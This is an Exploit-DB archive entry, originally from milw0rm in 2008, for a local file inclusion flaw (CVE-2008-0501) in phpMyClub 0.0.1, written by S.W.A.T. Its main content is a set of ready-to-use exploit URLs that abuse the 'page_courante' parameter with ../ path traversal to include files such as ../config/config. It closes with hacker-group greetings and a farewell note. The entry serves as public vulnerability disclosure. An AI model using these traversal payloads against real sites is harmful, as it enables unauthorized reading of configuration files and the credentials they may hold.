phpMyClub 0.0.1 - 'page_courante' Local File Inclusion

Author: S.W.A.T.
type: webapps
platform: php
port: 
date_added: 2008-01-27 
date_updated: 2016-11-14 
verified: 1 
codes: OSVDB-40908;CVE-2008-0501 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpMyClub-0.0.1.zip

## phpMyClub Local File Inclusion Vulnerability

## Download script :
http://ovh.dl.sourceforge.net/sourceforge/phpmyclub/phpMyClub-0.0.1.zip

## Author : S.W.A.T.

## E-Mail : svvateam@yahoo.com - swat@svvat.ir

## Home : http://svvat.ir

## For Execute Exploit Does Not Write Extention Of
File

## example : [script]/?page_courante=../config/config

## exploit :

## http://localhost/[script]/?page_courante=../[name of file without .php]
##
http://localhost/[script]/?page_courante=../config/config

## Greetz:

## Xmors Digital Security Team - Str0ke - Dj7xpl - DarKLiFe - NazNazi

## In Portland Now - Maybe I Can't See IRAN Anyway (
This Is Really Bye NET  :(  For Ever )


#########################################################################
   #								           #
   #   BYE ALL MY FRIENDS OVER THE NET & EVERYTHING ON THE NET             #
   #								           #
   #########################################################################


# milw0rm.com [2008-01-28]